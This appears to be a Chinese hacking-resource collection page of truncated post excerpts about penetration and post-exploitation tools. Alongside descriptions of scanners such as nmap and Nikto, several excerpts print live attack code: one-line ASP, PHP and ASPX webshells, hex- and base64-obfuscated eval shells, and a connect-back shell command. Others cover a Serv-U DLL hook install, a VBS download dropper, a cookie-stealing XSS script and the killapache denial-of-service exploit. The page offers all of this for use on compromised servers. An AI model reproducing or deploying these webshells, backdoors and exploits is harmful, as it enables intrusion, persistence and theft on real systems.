收集盒 Book box

<br /><br />Connect back shell golds7n version<br />bc <ip> <port> [shell]<br /><br />用法:  bc   ip地址  端口   cmd路径(可选项)<br /><br />远程机器执行:<br />bc 10.10.88.88 21 c:/windows/system32/msdtc/cmd.exe<br /><br />本机:<br />C:/Documents and Settings/Administrator>nc

<br /><br />http://en.wikipedia.org/wiki/List_of_tools_for_static_code_analysis<br />C/C++<br />1、flawfinder<br />http://www.dwheeler.com/flawfinder/<br />2、Bunny the Fuzzer (fuzzer function)<br />http://code.google.com/p/bunny-the-fuzzer/wiki/BunnyDoc<br

<br /><br />Modified By toby57<br />有时候需要在线管理SQLServer数据库，手上马儿自带的功能太不直观方便，于是在网上找到了BBSGOOD的mssql_online_v1.0beta，不过发现其文件过多，不方便上传，今天花点时间把功能都修改整合成了一个文件。<br /><br />代码如下(SQLServer.asp):<br /><%<br />if trim(request.Cookies("linkok"))<>"yes" then<br />if trim(r

<br /><br />工具适用人群：获取服务器或webshell权限后，想知道服务器上到底有哪些虚拟网站，这些网站的域名什么，网站绑定的端口，该网站是否停用，网站的物理路径是什么，网站的有哪些虚拟目录，虚拟目录的名字和物理路径是什么<br />该工具并非完全原创，在前人的基础上，参照adsutil.vbs修改而成<br />使用说明：cscript GetWebinfo.vbs<br /><br />代码保存为GetWebinfo.vbs：<br />On Error Resume Next<br />W

<br /><br />端口转发映射的程序叫rinetd，启动方法rinetd -c /etc/rinetd.conf 。<br />把1.1.1.1的11端口映射到2.2.2.2的3389端口，配置文件如下<br />[root@localhost iso]# cat /etc/rinetd.conf<br />1.1.1.1 11 2.2.2.1 3389<br />1.1.1.1 12 2.2.2.2 3389<br />1.1.1.1 13 2.2.2.3 22<br />1.1.1.1 14 2.

<br /><br />asp版的，这是utf-8编码，自己看着弄吧<br /><%@LANGUAGE=”JAVASCRIPT” CODEPAGE=”65001″%><br /><%<br />var lcx = {‘名字’ : Request.form(‘#’), ‘性别’ : eval, ‘年龄’ : ‘18′, ‘昵称’ : ‘请叫我一声老大’};<br />lcx.性别((lcx.名字)+”);<br />%><br />用冰狐就行了<br /><?php<br />@preg_replace(“/

<br /><br /><br /><br /><br /><br />==================================<br />安装方法:<br />将DLL放到Serv-U 安装目录下.<br />打开安装目录下的: ServUDaemon.ini 文件,在最后部分加入3行:<br />[EXTERNAL]<br />ClientCheckDLL1=Serv-U.dll<br />EventHookDLL1=Serv-U.dll<br />=====================

<br /><br /> <br />http://www.edge-security.com/soft/wfuzz-1.4b-win.tar.gz<br /> <br />http://nmap.org/dist/nmap-5.00-win32.zip<br /> <br />http://freeworld.thc.org/thc-hydra/hydra-5.4-win.zip<br /> <br />http://windowsaudit.com/downloads/WinScanX_Basic.zi

All In One(AIO) V1.0 Build 06/10/2006 By WinEggDrop这是一个将很多小工具功能集成一体的一个"工具".(如果你使用的是Build 04/01/2006版本,那版本中的syn扫描因编译时原因有些问题,请更新为Build 06/10/2006版本)功能:1.AutoRun -> 查看一般登陆后启动的项用法:Aio.exe -AutoRun2.Clone -> 克隆帐户

Execute(HextoStr("65786563757465287265717565737428636872283335292929"))Function HextoStr(data)HextoStr="EXECUTE """""C="&CHR(&H"N=")"Do Whil

主要功能：黑客防御Safe3 WEB应用防火墙基于WEB入侵异常检测技术，对WEB应用实施全面、深度防御，能够有效识别、阻止日益盛行的WEB应用黑客攻击（如SQL注入、钓鱼攻击、表单绕过、缓冲区溢出、CGI扫描、目录遍历等）：SQL注入命令注入

网络收集整理，有待验证。保存为bat文件，执行！ @echooff echo"虚拟主机C盘权限设定" echo"Author:an85.com" echo"删除C盘的everyone的权限" cd/ cacls"%SystemDrive%"/r"e

by Tm3yShell7客户端用菜刀，密码cmd，url为test.php?ts7=assert这个应该算没有什么特征码了，但是缺点就是在web日志中会暴露出来assert可以都用post：在菜刀说明用ts7=assertpost

/*online encode by cha88.cn! */eval(gzinflate(base64_decode('7b1rd2THcSD4GTyH/+F2scRbYBfqBfQL6EI3Go9uNNEAiEc3uwFMbT1uFW6jqm6xbhUeb

tsakwaf 是一款针对web应用防火墙(WAF)的瑞士军刀，它的主要目的是支持web应用程序渗透测试人员的日常工作。tasfwaf  有一些独有的特点，它能够识别不同的web应用防火墙并能够检测WAF的能力。tsakwaf 基于perl编写，可以识别一些被支持的WAF

Zed Attack Proxy (ZAP)是一个易于使用交互式的用于web应用程序漏洞挖掘的渗透测试工具。ZAP即可以用于安全专家、开发人员、功能测试任何甚至是渗透测试入门人员。ZAP除了提供了自动扫描工具还提供了一些用于手动挖掘安全漏洞的工具。目前ZAP更新之1.3.2版，新

XSSS软件是一个强力的跨站点脚本扫描器 。 特点抓取网站检测参数的形式和网址填写表格，改变参数，包括控制字符扫描Web服务器的响应，为我们的输入Original Text:在网页的代码又名JScri

killapache.pl#Apache httpd Remote Denial of Service (memory exhaustion)#By Kingcope#Year 2011## Will result in swapping memory t

Complemento是一个渗透测试工具集，它收集了诸多渗透测试工具，例如：LetDown是一个TCP flooder，在文章"TCP Resource Exhaustion and Botched Disclosure"的基础上开发。Reverse raider是一个域名扫描工

Windows Credentials Editor v1.2 (WCE)这款软件,除了抓HASH，还能注入HASH攻击，提升为域管理员权限。参数如下：        -l              List logon sessions and NTLM crede

很多人经常需要XSS得到别人Cookies或者要在网页里插入脚本或许密码。今天写个通用脚本工具文件如下asp.asp或者php.php 或者cookies.htm效果如下保存文本发送邮件获取的cookies

1.文件下载(无回显)echo iLocal = LCase(WScript.Arguments(1)) >iget.vbeecho iRemote = LCase(WScript.Arguments(0)) >>iget.vbeecho Set xP

检测管理员上线就注销自已：　　@echo off　　:check　　choice /C YN /T 10 /D Y　　quser find "#16"   && del xx.bat logoff　　goto check　　    #16 每次运行这个

HWay && Serv-U.php利用Serv-U的本地权限提升漏洞自动安装Hway!即使服务器的Serv-U密码被更改,只要ServUAdmin.exe可读,它便能读出更改后的密码.此外HWay && Serv-U.php还具有本地端口扫描的功能.如果服务器的Se

国外大牛的作品，偶顺手写了个使用说明。E文好的看原文http://www.sensepost.com/research/reDuh/这个工具可以把内网服务器的端口通过http/https隧道转发到本机，形成一个连通回路。用于目标服务器在内网或做了端口策略的情况下连接目标服

最近遇到了国内某大牛，听说了一个叫做DNS tunnel的技术，经过一番研究，发现很有趣，记录一下。什么是DNS tunnel？DNS tunnel 即 DNS隧道。从名字上来看就是利用DNS查询过程建立起隧道，传输数据。为什么使用DNS tunnel？

2005年6月，在西雅图郊区的微软公司总部园区内的管理情报中心，微软公司召开了一次“蓝帽”峰会。在会议中一款名为“Metasploit”的黑客工具出尽了风头，让微软公司的安全人员认为网络安全历史将因此工具而改写……Metasploit简介Metasploit其实是一个溢出

1.简介Metasploit Framework 是一个缓冲区溢出测试使用的辅助工具，也可以说是一个漏洞利用和测试平台。它集成了各平台上常见的溢出漏洞和流行的shellcode，并且不断更新，使得缓冲区溢出测试变得方便和简单。2.主页www.metasploit.co

在这个网站http://www.subhashdasyam.com/你可以发现一些在线的渗透测试工具。大家试试看吧，呵呵，不过下面那个破解wordpress密码的还能用在线端口扫描：    http://scan.subhashdasyam.com/port-scanner.php在线VNC扫描：    http://scan.subhashdasyam.com/dumpe

Fimap 是一款本地及远程都包含文件漏洞检测工具，并能对检测到的漏洞进行利用，带了一个google 的语法搜索功能。参考网站:http://code.google.com/p/fimap/ ./fimap.py -h        --帮助./fimap.py -u 'www.google.com/p?=lostwolf'  #单url检测./fimap.py -m -l u

Written and maintained by Michal Zalewski lcamtuf@google.com>.Copyright 2009, 2010, 2011 Google Inc, rights reserved.Released under terms and conditions of the Apache License, version 2.0.What is

常用最详细的扫描参数：db_nmap -sS -sU -T4 -A -v -O -Pn 127.0.0.1官网中文说明文档http://nmap.org/man/zh/man-version-detection.htmlnmap-网络探测和安全扫描工具2.语法nmap [Scan Type(s)] [Options]3.描述　　nmap是一个网络探测

Version0.3Homepagehttp://arachni.segfault.grBloghttp://trainofthought.segfault.gr/category/projects/arachni/Github pagehttp://github.com/zapotek/arachniDocumentatio

ISTO的版本   ASPX One Code    " enctype="multipart/form-data">filename:      c#if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"])  ); }

名称：Nikto2开发语言：perl官方网站：http://www.cirt.net/说明：Nikto2 是一款使用perl 语言写的多平台扫描软件，是一款 命令行模式的工具，它可以扫描指定主机的web类型、主机名、特定目录、cookie、特定cgi 漏洞、xss漏洞、sql注入漏洞、返回主机允许的http 方法等安全问题。Nikto 是一款非常著名的web评估工具，几乎到

http://www.morningstarsecurity.com/research/whatwebDownloadwhatweb-0.4.7.tar.gzLatest Version0.4.7, 5th April 2011LicenseGPLv2Authorurbanadventurer aka Andrew Horton from Security-

Nikto是一款Web安全扫描工具，可以扫描指定主机的web类型，主机名，特定目录，cookie，特定CGI漏洞，XSS漏洞，SQL注入漏洞等，非常强大滴说。。。root@91ri.org:~# cd /pentest/web/nikto/root@91ri.org:/pentest/web/nikto# lsdocs nikto.conf nikto.pl plugins tem

很好用！.NET 提权必备工具！ScanWrtieableprotected void Page_Load(object sender, EventArgs e){}int cresults;protected void ScanRights(DirectoryInfo cdir){try{if (Int32.Pars

转自：涅磐小鸟0x01 XSS Shell简介 XSS Shell一个windows环境下的XSS攻击平台。下载地址为：http://www.portcullis-security.com/tools/free/XSSShell039.zip利用XSS Shell，攻击者可以轻松攻击存在XSS漏洞的网站的用户。目前可以实施的攻击包括但不限于：

skipfish是Google的工程师MIchal Zalewski开发的另一款网站安全检测工具，它完全实现了全自动化操作，所以不需要人工干预，这一点上比RatProxy要好用一些，当然在功能上也强大更多了。    可以从http://code.google.com/p/skipfish/下载它。 安装Cygwin    与ratproxy一样，在win